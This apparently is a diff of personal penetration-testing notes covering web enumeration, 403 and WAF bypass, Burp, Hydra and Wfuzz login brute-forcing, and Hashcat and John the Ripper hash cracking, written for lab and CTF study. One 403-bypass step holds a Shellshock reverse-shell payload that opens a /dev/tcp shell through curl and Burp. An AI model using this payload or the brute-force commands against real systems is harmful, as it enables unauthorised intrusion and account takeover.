Enumeration is often used by attackers to gather information about a target system during the reconnaissance phase of a cyber attack. It can also be used by system administrators to identify and manage files and directories on a file system.
Gobuster
```
gobuster dir -u WEBSITE -w WORDLIST -x "html,txt,php,zip,..." -t 25 --timeout Xs --exclude-length X
```
- -u = URL
- -w = Wordlist
- -x = Append at the end of the directory
- -t = treats
- --timeout = Add some time between respond
- --exclude-lenght = Exclude result that has X bytes of data
More Information ---> [[Red Team/2 - Scanning + Enumeration/2 - Enumeration/Directory/• Gobuster]]

View file

@ -0,0 +1,14 @@
Subdomain enumeration is the process of identifying all subdomains of a given domain. This can be done using various tools, such as recon-ng, dnsrecon, and Sublist3r.
Some common methods used in subdomain enumeration include using search engines, brute-force techniques, and scraping website pages. The goal of subdomain enumeration is to identify subdomains that may contain vulnerabilities or sensitive information that can be used in further attacks.
Gobuster
```
gobuster vhost -u <target_url> -w <wordlist_file>
```
ffuf
```
ffuf -H "Host: FUZZ.domain.com" -H "User-Agent: Vhost Finder" -c -w /usr/share/seclists/Discovery/DNScombined_subdomains.txt -u http://domain.com
```

View file

@ -0,0 +1,9 @@
During a vulnerability scan, an open port on a web server may be discovered. This indicates that the server is running a service or application on that port, and it may be possible to interact with it. However, just because a port is open does not necessarily mean that it is vulnerable to attack.
Further investigation and testing may be required to determine if the service or application running on the open port has any known vulnerabilities that can be exploited. This information can be used by a penetration tester to plan and execute an attack on the web server.
Nikto
```
nikto -h http://www.example.com
```

View file

@ -0,0 +1,8 @@
## Manual Search
- Check the source code for any comments that may contain sensitive information, such as login credentials or server information.
- Review the `robots.txt` file to see which parts of the website are disallowed to be crawled by search engines. This can reveal hidden pages or directories that may be interesting to explore further.
- Check for the existence of a `sitemap.xml` file, which can provide an overview of the structure and organization of the website, including links to all of the pages on the site. This can be useful for identifying areas of the website that may be vulnerable to attack.

BIN
tools/3.Web-Hacking/.DS_Store vendored Normal file

Binary file not shown.

Binary file not shown.

View file

@ -0,0 +1,34 @@
## How to bypass 403 Errors
**Technique number 1**
- Appending `{%2e} or {%2f} { **/*, /./}` after the first slash
- https://www.domain/DB = 403
- https://www.domain/%2e/DB] =200
- https://www.domain/./DB] =200
**Technique number 2**
- Adding headers to requests module.
- Content-Length: 0
- X-rewrite-url
- X-Original-URL
- X-Custom-IP-Authorization
- X-Forwarded-For
**Technique number 3**
- Change the request method
- GET → POST
- GET → TRACE
- GET → PUT
- GET **→** OPTIONS
**Technique number 4**
- Using Curl
- curl -i -s -k -X $GET -H $Host: account.domain.com -H $X-rewrite-url: admin/login $https://account.domain.com/'
**Technique number 5**
- Brute force sub directory from the 403 directory
- Try using (wordlist/dirb/comon.txt)
- Setup Netcat lisener
- Inject parameters from Curl or Burp Suite
- CURL ---> curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi
- Burp Suite ---> Change User-Agent: () { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1
- More info ---> https://hackbotone.com/shellshock-attack-on-a-remote-web-server-d9124f4a0af3

View file

@ -0,0 +1,12 @@
## General Tactics
More information ---> https://github.com/0xInfection/Awesome-WAF (VERY GOOD)
Guide to bypass many WAF (CloudFlare, aeSecure, ....)
General Option
- Change User-Agent
- Powerfull User Agent ---> *User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36*
- Use headers to confuse server about IP:
- `Origin`
- `X-Forwarded-For`
- ...

View file

@ -0,0 +1,23 @@
## What is Collaborator Module?
Burp Collaborator is a network service that Burp Suite uses to help discover many kinds of vulnerabilities. For example:
- Some injection-based vulnerabilities can be detected using payloads that trigger an interaction with an external system when successful injection occurs. For example, some [blind SQL injection](https://portswigger.net/web-security/sql-injection/blind) vulnerabilities cannot be made to cause any difference in the content or timing of the application's responses, but they can be detected using payloads that cause an external interaction when injected into a SQL query.
- Some service-specific vulnerabilities can be detected by submitting payloads targeting those services to the target application, and analyzing the details of the resulting interactions with a collaborating instance of that service. For example, mail header injection can be detected in this way.
- Some vulnerabilities arise when an application can be induced to retrieve content from an external system and process it in some way. For example, the application might retrieve the contents of a supplied URL and include it in its own response.
When Burp Collaborator is being used, Burp sends payloads to the application being audited that are designed to cause interactions with the Collaborator server when certain vulnerabilities or behaviors occur. Burp periodically polls the Collaborator server to determine whether any of its payloads have triggered interactions:
![Burp Collaborator](https://portswigger.net/burp/documentation/images/collaborator/collaborator-1.svg)
Burp Collaborator is used by [Burp Scanner](https://portswigger.net/burp/documentation/scanner) and the [manual Burp Collaborator client](https://portswigger.net/burp/documentation/desktop/tools/collaborator-client), and can also be used by [Burp extensions](https://portswigger.net/burp/documentation/desktop/extensions).
## How to use it
- Click the Brup menu ---> Burp Collaborator Client
- Select the button "Copy to clipboard"
- Use this URL has the receiver to verify if the connection is done
## More Information
**All Information** ---> https://portswigger.net/burp/documentation/collaborator

View file

@ -0,0 +1,21 @@
## General
Burp's Platform Authentication feature allows users to configure the software to automatically authenticate with destination web servers. This can be useful for automating tasks and simplifying the process of interacting with servers that require authentication. In this context, the specific authentication type being discussed is Windows Challenge/Response (NTLM), which is a protocol used for authentication on networks and systems running the Windows operating system. The article describes how to configure Burp Suite to work with an application that uses NTLM authentication.
## Commands
NTLM credentials are based on data obtained during the interactive logon process and consist of a domain name, a user name, and a one-way hash of the user's password.
When an application is using NTLM authentication, you will need to configure Burp Suite to automatically carry out the authentication process.
You can configure these settings at User Options > Connections > Platform Authentication.
Use the Add function to configure new credentials.
![[Pasted image 20230105192616.png]]
Select the correct authentication type and add the appropriate credentials.
![[Pasted image 20230105192712.png]]
With the credentials configured correctly, Burp automatically carries out the NTLM authentication, allowing access to the destination application web server.
Video ---> https://d21v5rjx8s17cr.cloudfront.net/support/videos/1080_Using_NTLM.mp4

View file

@ -0,0 +1,15 @@
## What is MiTHproxy
MITMproxy is a free and open-source command-line tool that allows users to intercept, inspect, and modify HTTP and HTTPS traffic in real-time. It can be used as a proxy server or a transparent proxy, and it runs on most operating systems, including Windows, macOS, and Linux.
This tool is mostly used to intercept request made on phone
## Steps
```
# Computer
sudo ./mitmweb --set web_port=8082 ---> Web interface for proxing phone
# Phone
Go to the setting/wifi and change the IP for the ip of the computer and the port set from the mitmweb
Dowload a certificate from mitm.it and set the certificate to be trusted has root (settings)
```

View file

@ -0,0 +1,20 @@
## What is FFUF
FFUF is an open-source web fuzzing tool that stands for "Fuzz Faster U Fool". It is designed to help web developers and security professionals discover hidden or undiscovered files, directories, and subdomains by brute-forcing or fuzzing URLs.
FFUF supports various HTTP methods such as GET, POST, PUT, DELETE, HEAD, and many more. It also allows the use of custom headers and cookies. The tool can perform content discovery and web content monitoring.
## Common uses and commands
FFUF can be used for various purposes such as directory and file discovery, virtual host discovery, parameter brute-forcing, and many more. Some of the common commands that can be used with FFUF include:
Website Enumeration
```Terminal
ffuf -u WEBISTE/FUZZ -w WORDLIST -fs NUMBER -fc STATUS -t NUMBER_TREATH
```
- -u ---> Website (Include the FUZZ word were you want to Fuzz)
- -w ---> Wordlist to be select
- -fs ---> Default response number (bytes) to ignore
- -fc ---> Response status to ignore (example 404,402, ...)
## More Information
FFUF can be downloaded from its GitHub page at [https://github.com/ffuf/ffuf](https://github.com/ffuf/ffuf). The tool is compatible with Windows, Linux, and macOS. FFUF has extensive documentation available on its GitHub page, including examples, tutorials, and user guides.

View file

@ -0,0 +1,35 @@
## What is Gobuster?
Gobuster is an open-source command-line tool used for directory and DNS subdomain brute-forcing. It allows users to discover hidden files and directories on a web server, and find subdomains on a given domain.
The tool works by sending HTTP/HTTPS requests to the web server or DNS queries to the domain name server, and analyzes the responses to determine if there are any hidden files, directories or subdomains.
## # Common Use and Commands:
Gobuster is commonly used by security researchers, penetration testers and system administrators to identify potential security vulnerabilities and weaknesses in web applications.
The following are some common commands used in Gobuster:
Scan for directories:
```
gobuster dir -u <url> -w <wordlist>
gobuster dir -u <url> -w <wordlist> -x "html,txt,php,zip,..." -t 25 --timeout Xs --exclude-length X
```
- -u ---> URL
- -w ---> Wordlist
- -x ---> Append at the end of the directory
- -t ---> treats
- --timeout ---> Add some time between respond
- --exclude-lenght ---> Exclude result that has X bytes of data
Scan for subdomains:
```
gobuster dns -d <domain> -w <wordlist>
```
Gobuster supports multiple options and flags to customize the scan, such as setting the user-agent, specifying the proxy, setting the timeout and enabling recursion.
## More Information
For more information on Gobuster, including the latest updates and documentation, please visit the project's official Github repository: https://github.com/OJ/gobuster

View file

@ -0,0 +1,53 @@
## What is Hydra
Hydra is a parallelized, fast and flexible login cracker. If you don't have Hydra installed or need a Linux machine to use it, you can deploy a powerful [Kali Linux machine](https://tryhackme.com/room/kali) and control it in your browser!
Brute-forcing can be trying every combination of a password. Dictionary-attack's are also a type of brute-forcing, where we iterating through a wordlist to obtain the password.
## Common uses and commands
Hydra can be used for various purposes such as password brute-forcing, account takeover, and network authentication testing. Some of the common commands that can be used with Hydra include:
Website
```Terminal
hydra -l USERNAME -P PASSWORD.txt IP http-POST|GET-form "/PATH-URL/something.php:username=^USER^&password=^PASS^:INVALID-STATEMENT-HTML" -VV -T X
hydra -l phillips -P /home/ubuntu/Downloads/list.txt 10.10.206.120 http-get-form "/login-get
/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
```
- http-post-form = Request ---> <font color="Red">CHANGE POST OR GET</font>
- PATH = URL Path (From Website or BurpSuite)
- ^USER^ = Keyword to define the FUZZ of username
- ^PASS^ = Keyword to define the FUZZ of password.txt
- -t = Speed
- -VV = Verbose Enable
- Login trigger
- S= ---> Element on the other page (After login)
- HTML ---> HTML login fail element
- Tips
- If there is no ?something= ---> Simply add : after the URL (/account-login.php:BURP-STUFF-HERE)
- Example
- ![[Pasted image 20221010211610.png]]
- ![[Pasted image 20221010211700.png]]
SSH
```Terminal
hydra -l USERNAME -P WORDLIST.txt MACHINE_IP -t X ssh
hydra -L USERNAME.txt -P PASSWORD MACHINE_IP -t X ssh
```
- ssh = Service
FTP
```Terminal
hydra -l user -P passlist.txt ftp://MACHINE_IP
```
- ftp:// = FTP server
SMTP
```
hydra -l email@company.xyz -P /path/to/wordlist.txt smtp://10.10.x.x -v
```
## More Information
Hydra can be downloaded from its GitHub page at [https://github.com/vanhauser-thc/thc-hydra](https://github.com/vanhauser-thc/thc-hydra). The tool is compatible with Windows, Linux, and macOS. Hydra has extensive documentation available on its GitHub page, including examples, tutorials, and user guides.

View file

@ -0,0 +1,16 @@
## What is Wfuzz
WFUZZ is an open-source web application security testing tool used for brute-forcing and fuzzing HTTP/HTTPS web applications. The tool is designed to identify vulnerabilities in web applications by discovering hidden or undiscovered content such as files, directories, and parameters.
WFUZZ supports various HTTP methods such as GET, POST, PUT, DELETE, and many more. It can also be used for SSL and proxy connections. The tool can perform complex attacks by combining multiple parameters and testing different combinations.
## Common uses and commands
Wfuzz can be used for various purposes such as directory and file discovery, parameter brute-forcing, and vulnerability discovery. Some of the common commands that can be used with Wfuzz include:
Website Login
```
wfuzz -zfile,wordlists/passwords.txt --hs 'Invalid-HTML-STATMENT' -d 'username=access&password=FUZZ' https://DOMAIN/login
```
## More Information
Wfuzz can be downloaded from its GitHub page at [https://github.com/xmendez/wfuzz](https://github.com/xmendez/wfuzz). The tool is compatible with Windows, Linux, and macOS. WFUZZ has extensive documentation available on its GitHub page, including examples, tutorials, and user guides.

View file

@ -0,0 +1,28 @@
## What is Hashcat?
Hashcat is a popular, free, and open-source password cracking tool that is used to recover lost or forgotten passwords. It uses various cracking techniques to crack passwords, including brute-force attacks, dictionary attacks, and mask attacks.
Hashcat is a command-line tool that can work with a variety of different password hash types and can be used on a range of platforms, including Windows, Linux, and macOS. The tool is highly customizable, allowing users to specify attack methods, rules, and other parameters.
## Common Uses and Commands
Hashcat is primarily used for password cracking and recovery. Some common use cases include recovering forgotten passwords for personal accounts, testing the strength of passwords on a system, and auditing password-protected files.
To use Hashcat, users must first download and install the software on their system. Once installed, they can run it from the command line and specify the target hash type and the attack method to be used. Some common command line options for Hashcat include:
```Terminal
hashcat -m HASH-MODE HASH.FILE PASSWORD.TXT ---> Crack Hash
hashcat -m HASH-MODE HASH.FILE PASSWORD.TXT --show ---> Show Cracked Hash
hashcat -a 3 "?d?d?d?d" --stdout ---> Brute Force Mode
hashcat -b ---> Benchmark
```
- -m HASH-MODE ---> The hash mode found from identifing the hash type (Form tools section)
- --show ---> Show the Cracked Hash
- -b ---> Benchmark (Used to test GPU)
- -a 3  ---> Sets the attacking mode as a brute-force attack
- --stdout  ---> Print the result to the terminal
- ?d?d?d?d  ---> Tells hashcat to use a digit. In our case, ?d?d?d?d for four digits starting with 0000 and ending at 9999
## More Information
Hashcat is a widely used and respected tool in the field of password cracking and recovery. It has a large community of users who contribute to its development and improvement. The tool is constantly evolving to keep up with new security threats and password cracking techniques. Users can find more information and documentation on the tool's official website.
More information ---> https://hashcat.net/hashcat/

View file

@ -0,0 +1,12 @@
## Commands
- Check [[📁 Hacking/Cryptography/1 - Hashcat/🗒️ Commands]]
## Steps
- Go to https://vast.ai/console/instances/ and chose the GPU
- Make sure that you have your id_rsa key in the .ssh folder
- Launch the machine and use the normal hashcat commands
- You can import your wordlist with a wget or ssh transfer

View file

@ -0,0 +1,106 @@
## Key Terms
- **Plaintext** - Data before encryption or hashing, often text but not always as it could be a photograph or other file instead.
- **Encoding** - This is NOT a form of encryption, just a form of data representation like base64 or hexadecimal. Immediately reversible.
- **Hash** - A hash is the output of a hash function. Hashing can also be used as a verb, "to hash", meaning to produce the hash value of some data.
- **Brute force** - Attacking cryptography by trying every different password or every different key
- **Cryptanalysis** - Attacking cryptography by finding a weakness in the underlying maths
## What's a hash function?
Hash functions are quite different from encryption. There is no key, and its meant to be impossible (or very very difficult) to go from the output back to the input.
A hash function takes some input data of any size, and creates a summary or "digest" of that data. The output is a fixed size. Its hard to predict what the output will be for any input and vice versa. Good hashing algorithms will be (relatively) fast to compute, and slow to reverse (Go from output and determine input). Any small change in the input data (even a single bit) should cause a large change in the output.
The output of a hash function is normally raw bytes, which are then encoded. Common encodings for this are base 64 or hexadecimal. Decoding these wont give you anything useful.
- **Why should I care?**
Hashing is used very often in cyber security. When you logged into TryHackMe, that used hashing to verify your password. When you logged into your computer, that also used hashing to verify your password. You interact indirectly with hashing more than you would think, mostly in the context of passwords.
- **What's a hash collision?**
A hash collision is when 2 different inputs give the same output. Hash functions are designed to avoid this as best as they can, especially being able to engineer (create intentionally) a collision. Due to the pigeonhole effect, collisions are not avoidable. The pigeonhole effect is basically, there are a set number of different output values for the hash function, but you can give it any size input. As there are more inputs than outputs, some of the inputs must give the same output. If you have 128 pigeons and 96 pigeonholes, some of the pigeons are going to have to share.
MD5 and SHA1 have been attacked, and made technically insecure due to engineering hash collisions. However, no attack has yet given a collision in both algorithms at the same time so if you use the MD5 hash AND the SHA1 hash to compare, you will see theyre different. The MD5 collision example is available from [https://www.mscs.dal.ca/~selinger/md5collision/](https://www.mscs.dal.ca/~selinger/md5collision/)[](https://www.mscs.dal.ca/~selinger/md5collision/) and details of the SHA1 Collision are available from [https://shattered.io/](https://shattered.io/). Due to these, you shouldn't trust either algorithm for hashing passwords or data.
## What can we do with hashing?
Hashing is used for 2 main purposes in Cyber Security. To verify integrity of data (More on that later), or for verifying passwords.
- **Hashing for password verification**
Most webapps need to verify a user's password at some point. Storing these passwords in plain text would be bad. You've probably seen news stories about companies that have had their database leaked. Knowing some people, they use the same password for everything including their banking, so leaking these would be really really bad.
Quite a few data breaches have leaked plaintext passwords. Youre probably familiar with “rockyou.txt” on Kali as a password wordlist. This came from a company that made widgets for MySpace. They stored their passwords in plaintext and the company had a data breach. The txt file contains over 14 million passwords (although some are *unlikely* to have been user passwords. Sort by length if you want to see what I mean).
Adobe had a notable data breach that was slightly different. The passwords were encrypted, rather than hashed and the encryption that was used was not secure. This meant that the plaintext could be relatively quickly retrieved. If you want to read more about this breach, this post from Sophos is excellent: [https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/](https://nakedsecurity.sophos.com/2013/11/04/anatomy-of-a-password-disaster-adobes-giant-sized-cryptographic-blunder/)
Linkedin also had a data breach. Linkedin used SHA1 for password verification, which is quite quick to compute using GPUs. 
You can't encrypt the passwords, as the key has to be stored somewhere. If someone gets the key, they can just decrypt the passwords.
This is where hashing comes in. What if, instead of storing the password, you just stored the hash of the password? This means you never have to store the user's password, and if your database was leaked then an attacker would have to crack each password to find out what the password was. That sounds fairly useful.
There's just one problem with this. What if two users have the same password? As a hash function will always turn the same input into the same output, you will store the same password hash for each user. That means if someone cracks that hash, they get into more than one account. It also means that someone can create a "Rainbow table" to break the hashes.
- **Rambo Table**
A rainbow table is a lookup table of hashes to plaintexts, so you can quickly find out what password a user had just from the hash. A rainbow table trades time taken to crack a hash for hard disk space, but they do take time to create.
Here's a quick example so you can try and understand what they're like.
![[Pasted image 20220923163157.png]]
Websites like Crackstation internally use HUGE rainbow tables to provide fast password cracking for hashes without salts. Doing a lookup in a sorted list of hashes is really quite fast, much much faster than trying to crack the hash.
- **Protecting against rainbow tables**
To protect against rainbow tables, we add a salt to the passwords. The salt is randomly generated and stored in the database, unique to each user. In theory, you could use the same salt for all users but that means that duplicate passwords would still have the same hash, and a rainbow table could still be created specific passwords with that salt.
The salt is added to either the start or the end of the password before its hashed, and this means that every user will have a different password hash even if they have the same password. Hash functions like bcrypt and sha512crypt handle this automatically. Salts dont need to be kept private.
## Recognising password hash
Automated hash recognition tools such as [https://pypi.org/project/hashID/](https://pypi.org/project/hashID/) exist, but they are unreliable for many formats. For hashes that have a prefix, the tools are reliable. Use a healthy combination of context and tools.  If you found the hash in a web application database, it's more likely to be md5 than NTLM. Automated hash recognition tools often get these hash types mixed up, which highlights the importance of learning yourself.
Unix style password hashes are very easy to recognise, as they have a prefix. The prefix tells you the hashing algorithm used to generate the hash. The standard format is`$format$rounds$salt$hash`.
Windows passwords are hashed using NTLM, which is a variant of md4. They're visually identical to md4 and md5 hashes, so it's very important to use context to work out the hash type.
On Linux, password hashes are stored in /etc/shadow. This file is normally only readable by root. They used to be stored in /etc/passwd, and were readable by everyone.
On Windows, password hashes are stored in the SAM. Windows tries to prevent normal users from dumping them, but tools like mimikatz exist for this. Importantly, the hashes found there are split into NT hashes and LM hashes.
Here's a quick table of the most Unix style password prefixes that you'll see.
![[Pasted image 20220923201457.png]]
A great place to find more hash formats and password prefixes is the hashcat example page, available here: [https://hashcat.net/wiki/doku.php?id=example_hashes](https://hashcat.net/wiki/doku.php?id=example_hashes).
For other hash types, you'll normally need to go by length, encoding or some research into the application that generated them. Never underestimate the power of research.
## Password craking
We've already mentioned rainbow tables as a method to crack hashes that don't have a salt, but what if there's a salt involved?
You can't "decrypt" password hashes. They're not encrypted. You have to crack the hashes by hashing a large number of different inputs (often rockyou, these are the possible passwords), potentially adding the salt if there is one and comparing it to the target hash. Once it matches, you know what the password was. Tools like Hashcat and John the Ripper are normally used for this.
- Why crack on GPUs?
Graphics cards have thousands of cores. Although they cant do the same sort of work that a CPU can, they are very good at some of the maths involved in hash functions. This means you can use a graphics card to crack most hash types much more quickly. Some hashing algorithms, notably bcrypt, are designed so that hashing on a GPU is about the same speed as hashing on a CPU which helps them resist cracking.
- Cracking on VMs?
Its worth mentioning that virtual machines normally dont have access to the host's graphics card(s) (You can set this up, but its a lot of work). If you want to run hashcat, its best to run it on your host (Windows builds are available on the website, run it from powershell). You can get Hashcat working with OpenCL in a VM, but the speeds will likely be much worse than cracking on your host. John the ripper uses CPU by default and as such, works in a VM out of the box although you may get better speeds running it on the host OS as it will have more threads and no overhead from running in a VM.
**NEVER (I repeat, NEVER!) use --force for hashcat**. It can lead to false positives (wrong passwords being given to you) and false negatives (skips over the correct hash).
UPDATE: As of Kali 2020.2, hashcat 6.0 will run on the CPU without --force. I still recommend cracking on your host OS if you have a GPU, as it will be much much faster..
**All Information** ---> https://github.com/hashcat/hashcat

View file

@ -0,0 +1,56 @@
## What is John the Ripper?
John the Ripper is a popular, free, and open-source password cracking tool that can be used for auditing and testing the strength of passwords. It is a command-line tool that uses various password cracking techniques to identify weak passwords.
John the Ripper can work with many different operating systems and can crack passwords for a wide range of applications, such as Unix, Windows, and databases. The tool is highly customizable and can be used to simulate various types of attacks, including dictionary attacks, brute-force attacks, and hybrid attacks.
## Common Uses and Commands
John the Ripper is primarily used for password cracking and testing. Some common use cases include testing the strength of passwords on a system, auditing password-protected files, and identifying weak passwords that need to be strengthened.
To use John the Ripper, users must first download and install the software on their system. Once installed, they can run it from the command line and specify the target file or system and the attack method to be used. Some common command line options for John the Ripper include:
```
# Brute Force
john [options] --wordlist=[path to wordlist] [path to file]
john [options] --wordlist=[path to wordlist] [path to file] --show passwd
```
- `[options]` ---> Hashing option
- `[path to file]`  ---> The file containing the hash you're trying to crack, if it's in the same directory you won't need to name a path, just the file.
- --show passwd ---> Display password dehashed
```
# Wordlist Creation
cat /etc/john/john.conf|grep "List.Rules:" | cut -d"." -f3 | cut -d":" -f2 | cut -d"]" -f1 | awk NF ---> List the rules
john --wordlist=single-password-list.txt --rules=best64 --stdout | wc -l
john --wordlist=single-password-list.txt --rules=KoreLogic --stdout
```
- --wordlist ---> Wordlist
```
# Create a Rule
sudo nano /etc/john/john.conf
ADD THIS LINE --> [List.Rules:Password-Attacks]
ADD THIS LINE --> Az"[0-9]" ^[!@#$]
john --wordlist=single-password-list.txt --rules=Password-Attacks --stdout
```
- --rules ---> To specify which rule or rules to use.
- --stdout ---> To print the output to the terminal.
- |wc -l ---> To count how many lines John produced.
```
# Zip2john Command (Converts Zip file hash to a format John can crack)
zip2john [path to zip file] > [output hash file]
```
## More Information
John the Ripper is widely used in the field of password security and cracking. It has a large community of users who contribute to its development and improvement. The tool is constantly evolving to keep up with new security threats and password cracking techniques. Users can find more information and documentation on the tool's official website.
Check [[Red Team/3 - Web Hacking/2 - Cryptography/1 - Cracking Tools/John The Ripper/• Informations]]
- Cracking NTML Hashes
- Cracking Shadow Hashes
- Cracking Single Mode Hashes
- Cracking Cracking Hashes
- Cracking Zip Hashes
- Cracking Rar Hashes
- Cracking SSH Hashes

View file

@ -0,0 +1,285 @@
## Cracking Basic Hashes
There are multiple ways to use John the Ripper to crack simple hashes, we're going to walk through a few, before moving on to cracking some ourselves.
- **John Basic Syntax**
The basic syntax of John the Ripper commands is as follows. We will cover the specific options and modifiers used as we use them.
``` Terminal
john [options] [path to file]
```
- john  ---> Invokes the John the Ripper program
- [path to file] ---> The file containing the hash you're trying to crack, if it's in the same directory you won't need to name a path, just the file.
- **Automatic Cracking**
John has built-in features to detect what type of hash it's being given, and to select appropriate rules and formats to crack it for you, this isn't always the best idea as it can be unreliable- but if you can't identify what hash type you're working with and just want to try cracking it, it can be a good option! To do this we use the following syntax:
```
john --wordlist=[path to wordlist] [path to file]
```
- --wordlist=  ---> Specifies using wordlist mode, reading from the file that you supply in the following path...
- [path to wordlist]  ---> The path to the wordlist you're using, as described in the previous task.
Example Usage: john --wordlist=/usr/share/wordlists/rockyou.txt hash_to_crack.txt
## Cracking NTML Hashes (Windows)
- **Windows hash cracking**
Now that we understand the basic syntax and usage of John the Ripper- lets move on to cracking something a little bit more difficult, something that you may even want to attempt if you're on a real Penetration Test or Red Team engagement. Authentication hashes are the hashed versions of passwords that are stored by operating systems, it is sometimes possible to crack them using the brute-force methods that we're using. To get your hands on these hashes, you must often already be a privileged user- so we will explain some of the hashes that we plan on cracking as we attempt them.
- **NTHash / NTLM**
NThash is the hash format that modern Windows Operating System machines will store user and service passwords in. It's also commonly referred to as "NTLM" which references the previous version of Windows format for hashing passwords known as "LM", thus "NT/LM".
A little bit of history, the NT designation for Windows products originally meant "New Technology", and was used- starting with [Windows NT](https://en.wikipedia.org/wiki/Windows_NT), to denote products that were not built up from the MS-DOS Operating System. Eventually, the "NT" line became the standard Operating System type to be released by Microsoft and the name was dropped, but it still lives on in the names of some Microsoft technologies. 
You can acquire NTHash/NTLM hashes by dumping the SAM database on a Windows machine, by using a tool like Mimikatz or from the Active Directory database: NTDS.dit. You may not have to crack the hash to continue privilege escalation- as you can often conduct a "pass the hash" attack instead, but sometimes hash cracking is a viable option if there is a weak password policy.
- **Practical**
Now that you know the theory behind it, see if you can use the techniques we practiced in the last task, and the knowledge of what type of hash this is to crack the ntlm.txt file!
- **Commands**
```Terminal
--format=nt
```
- format ---> nt (NTLM)
## Craking Shadow Hashes (Linux)
- **Craking Linux Hashes**
The /etc/shadow file is the file on Linux machines where password hashes are stored. It also stores other information, such as the date of last password change and password expiration information. It contains one entry per line for each user or user account of the system. This file is usually only accessible by the root user- so in order to get your hands on the hashes you must have sufficient privileges, but if you do- there is a chance that you will be able to crack some of the hashes.
- **Unshadowing**
John can be very particular about the formats it needs data in to be able to work with it, for this reason- in order to crack /etc/shadow passwords, you must combine it with the /etc/passwd file in order for John to understand the data it's being given. To do this, we use a tool built into the John suite of tools called unshadow. The basic syntax of unshadow is as follows:
```Terminal
unshadow [path to passwd] [path to shadow] > new-file.txt
```
- unshadow  ---> Invokes the unshadow tool
- [path to passwd] ---> The file that contains the copy of the /etc/passwd file you've taken from the target machine
- [path to shadow] ---> The file that contains the copy of the /etc/shadow file you've taken from the target machine
- **Note on the files**
When using unshadow, you can either use the entire /etc/passwd and /etc/shadow file- if you have them available, or you can use the relevant line from each, for example:
**FILE 1 - local_passwd** ---> Contains the /etc/passwd line for the root user:
```Terminal
root:x:0:0::/root:/bin/bash
```
**FILE 2 - local_shadow** ---> Contains the /etc/shadow line for the root user:
```Terminal
root:$6$2nwjN454g.dv4HN/$m9Z/r2xVfweYVkrr.v5Ft8Ws3/YYksfNwq96UL1FX0OJjY1L6l.DS3KEVsZ9rOVLB/ldTeEL/OIhJZ4GMFMGA0:18576::::::
```
- **Cracking**
We're then able to feed the output from unshadow, in our example use case called "unshadowed.txt" directly into John. We should not need to specify a mode here as we have made the input specifically for John, however in some cases you will need to specify the format as we have done previously using: `--format=sha512crypt`
```Terminal
john --wordlist=/usr/share/wordlists/rockyou.txt --format=sha512crypt unshadowed.txt
```
## Craking SSH Key
- **Cracking SSH Key Passwords**
Okay, okay I hear you, no more file archives! Fine! Let's explore one more use of John that comes up semi-frequently in CTF challenges. Using John to crack the SSH private key password of id_rsa files. Unless configured otherwise, you authenticate your SSH login using a password. However, you can configure key-based authentication, which lets you use your private key, id_rsa, as an authentication key to login to a remote machine over SSH. However, doing so will often require a password- here we will be using John to crack this password to allow authentication over SSH using the key.
- **SSH2John**
Who could have guessed it, another conversion tool? Well, that's what working with John is all about. As the name suggests ssh2john converts the id_rsa private key that you use to login to the SSH session into hash format that john can work with. Jokes aside, it's another beautiful example of John's versatility. The syntax is about what you'd expect. Note that if you don't have ssh2john installed, you can use ssh2john.py, which is located in the /opt/john/ssh2john.py. If you're doing this, replace the `ssh2john` command with `python3 /opt/ssh2john.py` or on Kali, `python /usr/share/john/ssh2john.py`.
```Terminal
ssh2john [id_rsa private key file] > [output file]
```
- ssh2john ---> Invokes the ssh2john tool
- [id_rsa private key file] ---> The path to the id_rsa file you wish to get the hash of
- [output file]  ---> This is the file that will store the output from
- **Cracking**
For the final time, we're feeding the file we output from ssh2john, which in our example use case is called "id_rsa_hash.txt" and, as we did with rar2john we can use this seamlessly with John:
```Terminal
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt
```
## Craking Rar
- **Cracking a Password Protected RAR Archive**
We can use a similar process to the one we used in the last task to obtain the password for rar archives. If you aren't familiar, rar archives are compressed files created by the Winrar archive manager. Just like zip files they compress a wide variety of folders and files.
- **Rar2John**
Almost identical to the zip2john tool that we just used, we're going to use the rar2john tool to convert the rar file into a hash format that John is able to understand. The basic syntax is as follows:
```Terminal
rar2john [rar file] > [output file]
```
- [rar file]  ---> The path to the rar file you wish to get the hash of
- [output file] ---> This is the file that will store the output from
- **Cracking**
Once again, we're then able to take the file we output from rar2john in our example use case called "rar_hash.txt" and, as we did with zip2john we can feed it directly into John..
```Terminal
john --wordlist=/usr/share/wordlists/rockyou.txt rar_hash.txt
```
## Crack Single Mode
- **Single Crack Mode**
So far we've been using John's wordlist mode to deal with brute forcing simple., and not so simple hashes. But John also has another mode, called Single Crack mode. In this mode, John uses only the information provided in the username, to try and work out possible passwords heuristically, by slightly changing the letters and numbers contained within the username.
- **Word Mangling**
The best way to show what Single Crack mode is,  and what word mangling is, is to actually go through an example:
If we take the username: Markus
Some possible passwords could be:
- Markus1, Markus2, Markus3 (etc.)
- MArkus, MARkus, MARKus (etc.)
- Markus!, Markus$, Markus* (etc.)
This technique is called word mangling. John is building it's own dictionary based on the information that it has been fed and uses a set of rules called "mangling rules" which define how it can mutate the word it started with to generate a wordlist based off of relevant factors for the target you're trying to crack. This is exploiting how poor passwords can be based off of information about the username, or the service they're logging into.
- **GECOS**
John's implementation of word mangling also features compatibility with the Gecos fields of the UNIX operating system, and other UNIX-like operating systems such as Linux. So what are Gecos? Remember in the last task where we were looking at the entries of both /etc/shadow and /etc/passwd? Well if you look closely You can see that each field is seperated by a colon ":". Each one of the fields that these records are split into are called Gecos fields. John can take information stored in those records, such as full name and home directory name to add in to the wordlist it generates when cracking /etc/shadow hashes with single crack mode.
- **Using Single Crack Mode**
To use single crack mode, we use roughly the same syntax that we've used to so far, for example if we wanted to crack the password of the user named "Mike", using single mode, we'd use:
```Terminal
john --single --format=[format] [path to file]
```
- --single  ---> This flag lets john know you want to use the single hash cracking mode.
- **A Note on File Formats in Single Crack Mode:**
